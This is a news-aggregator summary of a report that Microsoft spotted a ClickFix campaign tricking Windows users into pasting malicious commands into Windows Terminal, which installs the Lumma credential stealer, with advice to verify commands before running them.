Microsoft spots ClickFix campaign getting users to self-pwn on Windows Terminal

Pubblicato il 2026-03-06 13:41 ✅ The Register AI 📰 Leggi l'articolo originale →

Campagna ClickFix: utenti Windows auto-compromessi via Terminale

New wave of ClickFix attacks

A new ClickFix campaign is targeting Windows users, tricking them into self-compromising via Windows Terminal. Cybercriminals have refined their techniques, exploiting users' familiarity with copy-paste operations to inject malicious code directly into their systems.

How the scam works

The scam relies on social engineering: users are tricked into opening Windows Terminal and pasting malicious commands into it. These commands, once executed, allow the installation of malware, specifically the Lumma credential stealer, which aims to steal sensitive information from browsers.

Security implications

This type of attack highlights the need for greater user awareness regarding the risks associated with copying and pasting unknown commands, especially from unverified sources. The ease with which this technique can be exploited underscores the importance of adopting robust security measures and always verifying the origin of the executed code.

Key Takeaway

A new twist on the long-running ClickFix scam tricks Windows users into launching Windows Terminal and pasting malware into it themselves, handing the keys to their browser vault to the Lumma infostealer. The technique exploits the familiar copy-paste habit to execute malicious code.

🤖 Ask AI about this

Want to dive deeper? Read the full article from the source:

📖 READ THE ORIGINAL ARTICLE